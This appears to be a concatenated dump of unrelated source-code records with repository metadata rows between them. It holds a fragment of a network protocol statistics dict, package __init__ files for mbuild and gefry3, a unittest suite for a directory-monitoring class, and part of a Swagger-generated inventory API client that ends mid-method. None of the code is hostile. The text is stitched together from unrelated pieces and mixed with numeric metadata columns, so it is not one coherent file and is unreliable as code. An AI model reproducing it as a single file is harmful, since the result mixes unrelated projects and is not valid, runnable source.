'out_5min_max_bit_rate_bps': 0
},
'dns': {
'in_packet_count': 42,
'out_packet_count': 0,
'in_byte_count': 2000,
'out_byte_count': 0,
'in_5min_bit_rate_bps': 2000,
'out_5min_bit_rate_bps': 0,
'in_5min_max_bit_rate_bps': 2000,
'out_5min_max_bit_rate_bps': 0
},
'ldp': {
'in_packet_count': 81,
'out_packet_count': 83,
'in_byte_count': 0,
'out_byte_count': 0,
'in_5min_bit_rate_bps': 0,
'out_5min_bit_rate_bps': 0,
'in_5min_max_bit_rate_bps': 0,
'out_5min_max_bit_rate_bps': 0
},
'eigrp': {
'in_packet_count': 84,
'out_packet_count': 84,
'in_byte_count': 0,
'out_byte_count': 0,
'in_5min_bit_rate_bps': 0,
'out_5min_bit_rate_bps': 0,
'in_5min_max_bit_rate_bps': 0,
'out_5min_max_bit_rate_bps': 0
},
'ospf': {
'in_packet_count': 42,
'out_packet_count': 42,
'in_byte_count': 0,
'out_byte_count': 0,
'in_5min_bit_rate_bps': 0,
'out_5min_bit_rate_bps': 0,
'in_5min_max_bit_rate_bps': 0,
'out_5min_max_bit_rate_bps': 0
},
'Total': {
'in_packet_count': 462,
'out_packet_count': 216,
'in_byte_count': 5000,
'out_byte_count': 0,
'in_5min_bit_rate_bps': 5000,
'out_5min_bit_rate_bps': 0,
'in_5min_max_bit_rate_bps': 5000,
'out_5min_max_bit_rate_bps': 0
}
}
}
}
}
| 39.437908
| 53
| 0.402386
| 609
| 6,034
| 3.387521
| 0.073892
| 0.190015
| 0.271449
| 0.202618
| 0.843917
| 0.843917
| 0.836161
| 0.805138
| 0.805138
| 0.767814
| 0
| 0.094517
| 0.507292
| 6,034
| 152
| 54
| 39.697368
| 0.599395
| 0
| 0
| 0.684211
| 0
| 0
| 0.362943
| 0.162413
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
175d635b5dd426759e6383fe94453b69c326058f
| 135
|
py
|
Python
|
mbuild/lib/molecules/__init__.py
|
zijiewu3/mbuild
|
dc6a1053ddec7b5682b0413bd5b2d2a187cd24e8
|
[
"MIT"
] | null | null | null |
mbuild/lib/molecules/__init__.py
|
zijiewu3/mbuild
|
dc6a1053ddec7b5682b0413bd5b2d2a187cd24e8
|
[
"MIT"
] | null | null | null |
mbuild/lib/molecules/__init__.py
|
zijiewu3/mbuild
|
dc6a1053ddec7b5682b0413bd5b2d2a187cd24e8
|
[
"MIT"
] | null | null | null |
"""Library of molecules for mBuild."""
from mbuild.lib.molecules.ethane import Ethane
from mbuild.lib.molecules.methane import Methane
| 33.75
| 48
| 0.807407
| 19
| 135
| 5.736842
| 0.526316
| 0.183486
| 0.238532
| 0.40367
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096296
| 135
| 3
| 49
| 45
| 0.893443
| 0.237037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bd579b66f91b83aea6aaf4097e329f1924d12873
| 8,116
|
py
|
Python
|
components/wifi_server/app_test/test_directory_monitor.py
|
AustinHellerRepo/ArduinoBluetoothInterface
|
4b5a4c94c7111bb3870db6b622809b5dfd497443
|
[
"MIT"
] | 1
|
2021-10-14T20:36:42.000Z
|
2021-10-14T20:36:42.000Z
|
components/wifi_server/app_test/test_directory_monitor.py
|
AustinHellerRepo/DeviceMessagingSystem
|
4b5a4c94c7111bb3870db6b622809b5dfd497443
|
[
"MIT"
] | null | null | null |
components/wifi_server/app_test/test_directory_monitor.py
|
AustinHellerRepo/DeviceMessagingSystem
|
4b5a4c94c7111bb3870db6b622809b5dfd497443
|
[
"MIT"
] | null | null | null |
from app.directory_monitor import DirectoryMonitor
import tempfile
import unittest
import os
import time
import threading
from datetime import datetime
from typing import List
import uuid
def create_random_file_name(directory_path: str, extension: str) -> str:
_file_name = f"{uuid.uuid4()}{extension}"
_file_path = os.path.join(directory_path, _file_name)
with open(_file_path, "w") as _file_handle:
pass
return _file_path
class DirectoryMonitorTest(unittest.TestCase):
def test_initialize_0(self):
_temp_directory = tempfile.TemporaryDirectory()
_is_directory_exists = os.path.exists(_temp_directory.name)
self.assertEqual(True, _is_directory_exists)
_directory_monitor = DirectoryMonitor(
directory_path=_temp_directory.name,
include_subdirectories=False,
delay_between_checks_seconds=1.0
)
self.assertIsNotNone(_directory_monitor)
_temp_directory.cleanup()
def test_wait_0(self):
# start, delay too late for change
_temp_directory = tempfile.TemporaryDirectory()
_is_directory_exists = os.path.exists(_temp_directory.name)
self.assertEqual(True, _is_directory_exists)
_directory_monitor = DirectoryMonitor(
directory_path=_temp_directory.name,
include_subdirectories=False,
delay_between_checks_seconds=1.0
)
self.assertIsNotNone(_directory_monitor)
_created_temp_file_paths = [] # type: List[str]
def _change_directory_thread_method():
time.sleep(1.1)
_temp_file_path = create_random_file_name(_temp_directory.name, ".txt")
_created_temp_file_paths.append(_temp_file_path)
_change_directory_thread = threading.Thread(target=_change_directory_thread_method)
_change_directory_thread.start()
_directory_monitor.start()
_start_time = datetime.utcnow()
_directory_monitor.wait()
_end_time = datetime.utcnow()
_wait_seconds_total = (_end_time - _start_time).total_seconds()
_rounded_wait_seconds_total = round(_wait_seconds_total * 10) / 10
self.assertEqual(1.0, _rounded_wait_seconds_total)
self.assertEqual(0, len(_created_temp_file_paths))
time.sleep(1.0)
for _temp_file_path in _created_temp_file_paths:
os.unlink(_temp_file_path)
_temp_directory.cleanup()
def test_wait_1(self):
# start, change just before delay, root directory
_temp_directory = tempfile.TemporaryDirectory()
_is_directory_exists = os.path.exists(_temp_directory.name)
self.assertEqual(True, _is_directory_exists)
_directory_monitor = DirectoryMonitor(
directory_path=_temp_directory.name,
include_subdirectories=False,
delay_between_checks_seconds=1.0
)
self.assertIsNotNone(_directory_monitor)
_created_temp_file_paths = [] # type: List[str]
def _change_directory_thread_method():
time.sleep(0.9)
_temp_file_path = create_random_file_name(_temp_directory.name, ".txt")
_created_temp_file_paths.append(_temp_file_path)
_change_directory_thread = threading.Thread(target=_change_directory_thread_method)
_change_directory_thread.start()
_directory_monitor.start()
_start_time = datetime.utcnow()
_directory_monitor.wait()
_end_time = datetime.utcnow()
_wait_seconds_total = (_end_time - _start_time).total_seconds()
_rounded_wait_seconds_total = round(_wait_seconds_total * 10) / 10
self.assertEqual(2.0, _rounded_wait_seconds_total)
self.assertEqual(1, len(_created_temp_file_paths))
for _temp_file_path in _created_temp_file_paths:
os.unlink(_temp_file_path)
_temp_directory.cleanup()
def test_wait_2(self):
# start, change just before delay, multiple files, root directory
_temp_directory = tempfile.TemporaryDirectory()
_is_directory_exists = os.path.exists(_temp_directory.name)
self.assertEqual(True, _is_directory_exists)
_directory_monitor = DirectoryMonitor(
directory_path=_temp_directory.name,
include_subdirectories=False,
delay_between_checks_seconds=1.0
)
self.assertIsNotNone(_directory_monitor)
_created_temp_file_paths = [] # type: List[str]
def _change_directory_thread_method():
_sleep_seconds = 0.9
for _index in range(10):
time.sleep(_sleep_seconds)
_sleep_seconds = 1.0
_temp_file_path = create_random_file_name(_temp_directory.name, ".txt")
_created_temp_file_paths.append(_temp_file_path)
_change_directory_thread = threading.Thread(target=_change_directory_thread_method)
_change_directory_thread.start()
_directory_monitor.start()
_start_time = datetime.utcnow()
_directory_monitor.wait()
_end_time = datetime.utcnow()
_wait_seconds_total = (_end_time - _start_time).total_seconds()
_rounded_wait_seconds_total = round(_wait_seconds_total * 10) / 10
self.assertEqual(11.0, _rounded_wait_seconds_total)
self.assertEqual(10, len(_created_temp_file_paths))
for _temp_file_path in _created_temp_file_paths:
os.unlink(_temp_file_path)
_temp_directory.cleanup()
def test_wait_3(self):
# start, change just before delay, multiple files, ignore sub directories
_temp_directory = tempfile.TemporaryDirectory()
_is_directory_exists = os.path.exists(_temp_directory.name)
self.assertEqual(True, _is_directory_exists)
_directory_monitor = DirectoryMonitor(
directory_path=_temp_directory.name,
include_subdirectories=False,
delay_between_checks_seconds=1.0
)
self.assertIsNotNone(_directory_monitor)
_created_temp_file_paths = [] # type: List[str]
def _change_directory_thread_method():
try:
_sleep_seconds = 0.5
_directory_path = _temp_directory.name
for _index in range(10):
time.sleep(_sleep_seconds)
_sleep_seconds = 1.0
_temp_file_path = create_random_file_name(_directory_path, ".txt")
_directory_path = os.path.join(_directory_path, str(uuid.uuid4()))
os.mkdir(_directory_path)
_created_temp_file_paths.append(_temp_file_path)
except Exception as ex:
print(f"ex: {ex}")
_change_directory_thread = threading.Thread(target=_change_directory_thread_method)
_change_directory_thread.start()
_directory_monitor.start()
_start_time = datetime.utcnow()
_directory_monitor.wait()
_end_time = datetime.utcnow()
_wait_seconds_total = (_end_time - _start_time).total_seconds()
_rounded_wait_seconds_total = round(_wait_seconds_total * 10) / 10
time.sleep(9.0)
self.assertEqual(2.0, _rounded_wait_seconds_total)
self.assertEqual(10, len(_created_temp_file_paths))
for _temp_file_path in _created_temp_file_paths:
os.unlink(_temp_file_path)
_temp_directory.cleanup()
def test_wait_4(self):
# start, change just before delay, multiple files, inspect sub directories
_temp_directory = tempfile.TemporaryDirectory()
_is_directory_exists = os.path.exists(_temp_directory.name)
self.assertEqual(True, _is_directory_exists)
_directory_monitor = DirectoryMonitor(
directory_path=_temp_directory.name,
include_subdirectories=True,
delay_between_checks_seconds=1.0
)
self.assertIsNotNone(_directory_monitor)
_created_temp_file_paths = [] # type: List[str]
def _change_directory_thread_method():
try:
_sleep_seconds = 0.5
_directory_path = _temp_directory.name
for _index in range(10):
time.sleep(_sleep_seconds)
_sleep_seconds = 1.0
_temp_file_path = create_random_file_name(_directory_path, ".txt")
_directory_path = os.path.join(_directory_path, str(uuid.uuid4()))
os.mkdir(_directory_path)
_created_temp_file_paths.append(_temp_file_path)
except Exception as ex:
print(f"ex: {ex}")
_change_directory_thread = threading.Thread(target=_change_directory_thread_method)
_change_directory_thread.start()
_directory_monitor.start()
_start_time = datetime.utcnow()
_directory_monitor.wait()
_end_time = datetime.utcnow()
_wait_seconds_total = (_end_time - _start_time).total_seconds()
_rounded_wait_seconds_total = round(_wait_seconds_total * 4) / 4
self.assertEqual(11.0, _rounded_wait_seconds_total)
self.assertEqual(10, len(_created_temp_file_paths))
for _temp_file_path in _created_temp_file_paths:
os.unlink(_temp_file_path)
_temp_directory.cleanup()
if __name__ == "__main__":
unittest.main()
| 28.180556
| 85
| 0.782898
| 1,064
| 8,116
| 5.420113
| 0.098684
| 0.055488
| 0.05202
| 0.06936
| 0.921796
| 0.917808
| 0.896827
| 0.890064
| 0.867696
| 0.867696
| 0
| 0.012046
| 0.130606
| 8,116
| 287
| 86
| 28.278746
| 0.805272
| 0.045466
| 0
| 0.791667
| 0
| 0
| 0.009049
| 0.003232
| 0
| 0
| 0
| 0
| 0.114583
| 1
| 0.0625
| false
| 0.005208
| 0.046875
| 0
| 0.119792
| 0.010417
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bd77128afb1e7526e0ac40ccdb59a2faf89575c7
| 114
|
py
|
Python
|
gefry3/classes/__init__.py
|
jasonmhite/gefry3
|
4ebe0d456fd45b55a43769bb41b7cac7f9307ff3
|
[
"BSD-2-Clause"
] | 1
|
2019-06-26T19:52:56.000Z
|
2019-06-26T19:52:56.000Z
|
gefry3/classes/__init__.py
|
jasonmhite/gefry3
|
4ebe0d456fd45b55a43769bb41b7cac7f9307ff3
|
[
"BSD-2-Clause"
] | 3
|
2018-02-04T21:52:43.000Z
|
2018-08-21T19:04:59.000Z
|
gefry3/classes/__init__.py
|
jasonmhite/gefry3
|
4ebe0d456fd45b55a43769bb41b7cac7f9307ff3
|
[
"BSD-2-Clause"
] | 2
|
2017-10-03T14:58:39.000Z
|
2018-09-29T21:05:33.000Z
|
from gefry3.classes.material import *
from gefry3.classes.geometry import *
from gefry3.classes.hardware import *
| 28.5
| 37
| 0.815789
| 15
| 114
| 6.2
| 0.466667
| 0.322581
| 0.548387
| 0.494624
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.029412
| 0.105263
| 114
| 3
| 38
| 38
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
bd99fb53ad3c05865b9103842300aab91aff2c53
| 111,532
|
py
|
Python
|
InventoryClient/apis/default_api.py
|
Orkiv/Inventory-python-client
|
92724345f48f53693d582a9f4389296dda54eeb1
|
[
"Apache-2.0"
] | null | null | null |
InventoryClient/apis/default_api.py
|
Orkiv/Inventory-python-client
|
92724345f48f53693d582a9f4389296dda54eeb1
|
[
"Apache-2.0"
] | null | null | null |
InventoryClient/apis/default_api.py
|
Orkiv/Inventory-python-client
|
92724345f48f53693d582a9f4389296dda54eeb1
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
InventoryAPI
Orkiv Inventory API client
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class DefaultApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def all_get(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.all_get(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: list[InventoryGroup]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.all_get_with_http_info(**kwargs)
else:
(data) = self.all_get_with_http_info(**kwargs)
return data
def all_get_with_http_info(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.all_get_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: list[InventoryGroup]
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method all_get" % key
)
params[key] = val
del params['kwargs']
resource_path = '/all/'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[InventoryGroup]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def categories_delete(self, id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.categories_delete(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Id of category to remove (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.categories_delete_with_http_info(id, **kwargs)
else:
(data) = self.categories_delete_with_http_info(id, **kwargs)
return data
def categories_delete_with_http_info(self, id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.categories_delete_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Id of category to remove (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method categories_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `categories_delete`")
resource_path = '/categories/'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'id' in params:
query_params['id'] = params['id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Response',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def categories_post(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.categories_post(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Category query: Category to query against system
:return: list[Category]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.categories_post_with_http_info(**kwargs)
else:
(data) = self.categories_post_with_http_info(**kwargs)
return data
def categories_post_with_http_info(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.categories_post_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Category query: Category to query against system
:return: list[Category]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['query']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method categories_post" % key
)
params[key] = val
del params['kwargs']
resource_path = '/categories/'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'query' in params:
body_params = params['query']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Category]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def categories_put(self, id, category, **kwargs):
"""
If no ID is specified a new category will be created!
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.categories_put(id, category, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: category id to update. (required)
:param Category category: New category information. (required)
:return: Category
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.categories_put_with_http_info(id, category, **kwargs)
else:
(data) = self.categories_put_with_http_info(id, category, **kwargs)
return data
def categories_put_with_http_info(self, id, category, **kwargs):
"""
If no ID is specified a new category will be created!
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.categories_put_with_http_info(id, category, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: category id to update. (required)
:param Category category: New category information. (required)
:return: Category
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'category']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method categories_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `categories_put`")
# verify the required parameter 'category' is set
if ('category' not in params) or (params['category'] is None):
raise ValueError("Missing the required parameter `category` when calling `categories_put`")
resource_path = '/categories/'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'id' in params:
query_params['id'] = params['id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'category' in params:
body_params = params['category']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Category',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def item_add_post(self, item, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.item_add_post(item, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param ItemRequest item: Item to create. (required)
:return: Item
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.item_add_post_with_http_info(item, **kwargs)
else:
(data) = self.item_add_post_with_http_info(item, **kwargs)
return data
def item_add_post_with_http_info(self, item, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.item_add_post_with_http_info(item, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param ItemRequest item: Item to create. (required)
:return: Item
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['item']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method item_add_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'item' is set
if ('item' not in params) or (params['item'] is None):
raise ValueError("Missing the required parameter `item` when calling `item_add_post`")
resource_path = '/item/add/'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'item' in params:
body_params = params['item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Item',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def item_addbulk_post(self, items, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.item_addbulk_post(items, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[ItemRequest] items: Items to create. (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.item_addbulk_post_with_http_info(items, **kwargs)
else:
(data) = self.item_addbulk_post_with_http_info(items, **kwargs)
return data
def item_addbulk_post_with_http_info(self, items, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.item_addbulk_post_with_http_info(items, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[ItemRequest] items: Items to create. (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['items']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method item_addbulk_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'items' is set
if ('items' not in params) or (params['items'] is None):
raise ValueError("Missing the required parameter `items` when calling `item_addbulk_post`")
resource_path = '/item/addbulk/'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'items' in params:
body_params = params['items']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Response',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def item_delete(self, id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.item_delete(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: item id to remove (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.item_delete_with_http_info(id, **kwargs)
else:
(data) = self.item_delete_with_http_info(id, **kwargs)
return data
def item_delete_with_http_info(self, id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.item_delete_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: item id to remove (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method item_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `item_delete`")
resource_path = '/item/'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'id' in params:
query_params['id'] = params['id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Response',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def item_get(self, id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.item_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Item ID to open. (required)
:return: Item
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.item_get_with_http_info(id, **kwargs)
else:
